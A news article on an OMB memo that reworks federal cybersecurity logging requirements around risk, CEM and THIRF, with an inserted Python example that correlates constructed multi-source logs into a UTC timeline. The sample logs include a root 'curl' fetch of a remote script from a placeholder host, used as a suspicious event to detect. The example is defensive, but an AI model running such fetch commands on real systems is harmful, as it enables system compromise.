Federal agencies are being urged to adopt a more risk-driven strategy for collecting and retaining cybersecurity event logs. Under updated guidance, agency chief information security officers must now submit revised logging plans to the Cybersecurity and Infrastructure Security Agency (CISA) and the Office of Management and Budget (OMB), with emphasis on two key areas: continuous event monitoring (CEM) and threat hunting, investigation, response, and forensics (THIRF).
The updated directive, issued by OMB Director Russ Vought, overturns prior logging mandates and introduces streamlined expectations designed to reduce bureaucratic overhead and control costs.
“In 2021, OMB released Memorandum M-21-31—aimed at strengthening the federal government’s ability to investigate and remediate cybersecurity incidents by raising logging baselines and improving visibility into system events. That effort successfully built foundational capabilities across agencies,” Vought noted in the new memo, released Friday. “Yet certain requirements—like retaining massive volumes of log data without demonstrating clear operational value—proved impractical and too costly for most organizations. To address these shortcomings and adapt to the changing cyber threat landscape, this memo instructs agencies to prioritize logging based on actual risk.”
OMB initially mandated enhanced cyber event logging for agency CISOs following the SolarWinds breach, emphasizing that real-time visibility—especially through cloud environments and third-party providers—is critical for detecting, investigating, and resolving cyber threats.
However, as logging volumes grew, so did the expense and complexity. Agencies found they increasingly needed sophisticated tools powered by artificial intelligence and machine learning to parse and act on the data effectively.
A Government Accountability Office (GAO) report from December 2023 revealed that 20 out of 23 agencies failed to meet the August 2023 deadline for reaching maturity level 3 under the previous framework.
“Until agencies fully implement event logging requirements, the federal government’s capacity to detect, investigate, and remediate cyber threats remains limited,” GAO warned. “Agencies cited three major obstacles: insufficient staff, technical hurdles in event logging, and gaps in sharing cyber threat intelligence.”
The revised strategy begins with CISA developing a Logging Reference Architecture (LRA) within the next 90 days. This framework will guide agencies in achieving CEM and THIRF goals and serve as the primary resource for implementing effective logging practices.
Following the LRA’s release, agencies will have 90 days to finalize and submit their updated logging plans.
“These plans must outline the concrete steps needed to establish and sustain effective CEM and THIRF capabilities. They should detail actions required to meet the baseline standards set in this memo—as well as any additional logging activities aligned with CEM and THIRF objectives—while accounting for the agency’s specific threat environment, risk profile, and mission needs, as outlined in the CISA Logging Reference Architecture,” the memo specifies.
Core baseline requirements include retaining logs in a searchable format for at least six months, ensuring timestamps are synchronized via the Network Time Protocol (NTP), and making logs immediately accessible to the agency’s top-tier security operations center (SOC).
OMB describes CEM as the real-time monitoring of network and system activity, enabling rapid detection of anomalies and prompt response, a function typically managed by the SOC.
THIRF logs support post-incident forensic analysis and investigation after a known or suspected breach. Their purpose is to contain, remediate, and recover from adversary actions. To support THIRF, agencies must maintain both hot (immediately accessible) and cold (archival) storage, along with the ability to retrieve and correlate logs from diverse sources to reconstruct attack patterns.
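The baseline requirements above (zone-explicit, NTP-synchronized timestamps) and the THIRF requirement to correlate logs from diverse sources are two sides of the same problem: events can only be ordered into one attack timeline if every source's clock is synchronized and its zone is known. The following is an added example, not code from the memo, CISA, or this article. It normalizes three constructed record formats (a BSD-style syslog line with no year or zone, a JSON cloud audit event, and a key=value endpoint record with an epoch timestamp) into UTC, pivots on a user and source IP, and pulls in activity by a different identity on the same host shortly after a pivot event, so that a command run as root after sudo lands in the timeline. The hostnames, user, IP addresses, record formats, and the five-minute correlation window are all assumptions made for the example.

```python
"""Correlate logs from several sources into one UTC timeline (added example)."""
import json
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Constructed sample records from three hypothetical sources; not real logs.
SYSLOG_LINES = [
    "Mar 14 09:12:03 bastion01 sshd[4121]: Accepted publickey for jdoe from 203.0.113.7 port 51234 ssh2",
    "Mar 14 09:12:44 bastion01 sudo: jdoe : TTY=pts/0 ; PWD=/home/jdoe ; USER=root ; COMMAND=/usr/bin/curl http://example.net/x.sh",
]
CLOUD_AUDIT_JSON = [
    '{"time":"2026-03-14T09:11:30Z","user":"jdoe","action":"ConsoleLogin","src_ip":"203.0.113.7"}',
    '{"time":"2026-03-14T09:15:02Z","user":"jdoe","action":"CreateAccessKey","src_ip":"203.0.113.7"}',
]
EDR_KV_LINES = [  # ts is 2026-03-14T09:12:52Z as a Unix epoch
    'ts=1773479572 host=bastion01 user=root proc=curl cmdline="curl http://example.net/x.sh"',
]


@dataclass(frozen=True)
class Event:
    ts: datetime            # always timezone-aware and normalized to UTC
    source: str
    host: str
    user: Optional[str]
    src_ip: Optional[str]
    summary: str


def to_utc(ts: datetime) -> datetime:
    """Refuse naive timestamps: a record whose clock zone is unknown cannot be
    ordered against other sources, which is why the baseline requires
    synchronized, zone-explicit time."""
    if ts.tzinfo is None:
        raise ValueError("naive timestamp; the source must declare its zone")
    return ts.astimezone(timezone.utc)


SYSLOG_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$")


def parse_syslog(line: str, year: int, source_tz: Optional[timezone]) -> Event:
    """BSD syslog carries neither year nor zone; both must be supplied by the
    collector's knowledge of the host (an assumption, not something in the line)."""
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError(f"unparsed syslog line: {line!r}")
    naive = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    ts = to_utc(naive.replace(tzinfo=source_tz))
    user = ip = None
    if m["prog"] == "sshd":
        mm = re.search(r"for (\S+) from (\S+)", m["msg"])
        if mm:
            user, ip = mm.groups()
    elif m["prog"] == "sudo":
        mm = re.match(r"\s*(\S+) :", m["msg"])
        if mm:
            user = mm.group(1)
    return Event(ts, "syslog", m["host"], user, ip, f"{m['prog']}: {m['msg']}")


def parse_cloud_json(line: str) -> Event:
    rec = json.loads(line)
    ts = to_utc(datetime.fromisoformat(rec["time"].replace("Z", "+00:00")))
    return Event(ts, "cloud-audit", "cloud", rec["user"], rec.get("src_ip"), rec["action"])


KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_kv(line: str) -> Event:
    kv = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    ts = datetime.fromtimestamp(int(kv["ts"]), tz=timezone.utc)  # epoch is zone-free
    return Event(ts, "edr", kv["host"], kv.get("user"), None, f"{kv['proc']}: {kv.get('cmdline', '')}")


def build_timeline(events: List[Event], user: str, src_ip: Optional[str],
                   window: timedelta = timedelta(minutes=5)) -> List[Event]:
    """Direct hits match the pivot user or IP. Related hits are other-identity
    events on the same host within `window` after a direct hit (e.g. root
    activity following sudo). Both are merged and ordered on UTC time."""
    direct = [e for e in events if e.user == user or (src_ip and e.src_ip == src_ip)]
    related = [e for e in events if e not in direct and any(
        d.host == e.host and timedelta(0) <= e.ts - d.ts <= window for d in direct)]
    return sorted(direct + related, key=lambda e: e.ts)


def correlate_samples(year: int = 2026, utc_offset_hours: int = 0) -> List[Event]:
    """utc_offset_hours is the zone the collector believes the syslog host uses;
    declaring it wrongly is equivalent to an unsynchronized clock."""
    source_tz = timezone(timedelta(hours=utc_offset_hours))
    events = [parse_syslog(l, year, source_tz) for l in SYSLOG_LINES]
    events += [parse_cloud_json(l) for l in CLOUD_AUDIT_JSON]
    events += [parse_kv(l) for l in EDR_KV_LINES]
    return build_timeline(events, user="jdoe", src_ip="203.0.113.7")


if __name__ == "__main__":
    for e in correlate_samples():
        print(e.ts.isoformat(), e.source, e.host, e.user, e.summary)
```

With the syslog host correctly declared as UTC the timeline holds five events and the root-level curl appears eight seconds after the sudo. Re-running with `utc_offset_hours=-5` (a host whose zone was mis-declared, or whose clock is simply wrong) shifts the SSH and sudo events five hours later, and the root activity silently drops out of the timeline because it no longer follows any pivot event. That loss is the practical cost of the synchronization baseline not being met.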
“Every agency must apply these objectives to all systems it operates or that are operated on its behalf by third parties—including Internet of Things (IoT) and operational technology (OT) devices that are part of or constitute such systems,” the memo states.
As part of this risk-focused shift, OMB has also introduced an updated maturity model to track agency progress.
“This model defines performance benchmarks reflecting increasing levels of capability across several domains: system inventory visibility, log management planning, log collection and retention. Agencies will assess and report progress based on the percentage of systems meeting each maturity tier,” the memo explains.
The maturity model includes five components, each with four distinct levels of maturity:
- Inventory visibility
- Collection coverage
- Collection operations
- Data retention
- Log management
OMB has established staggered deadlines—120, 180, and 320 days—for agencies to achieve the first maturity level across each category.
In cases where a cyber compromise is detected or suspected, agencies must continue sharing logs and related data with both CISA and the FBI.
“Agencies should deliver this data in formats and through methods mutually agreed upon with CISA or the FBI. Whenever feasible, access to logs should be provided within the timeframes requested,” the memo instructs. “If accessing agency data involves statutory, regulatory, or judicial constraints, CISA and FBI leadership will follow required procedures or collaborate with the agency to establish lawful accommodations when available.”
In recent years, OMB and CISA have worked to simplify and reduce the cost of logging. In 2024, CISA partnered with Microsoft to pilot an advanced, no-cost logging solution with select agencies before expanding it government-wide.
That same year, CISA published the “Expanded Cloud Log Implementation Playbook”—developed with Microsoft—offering detailed guidance on newly available log types and how they can be leveraged for threat hunting and incident response.
© 2026 Federal News Network. All rights reserved.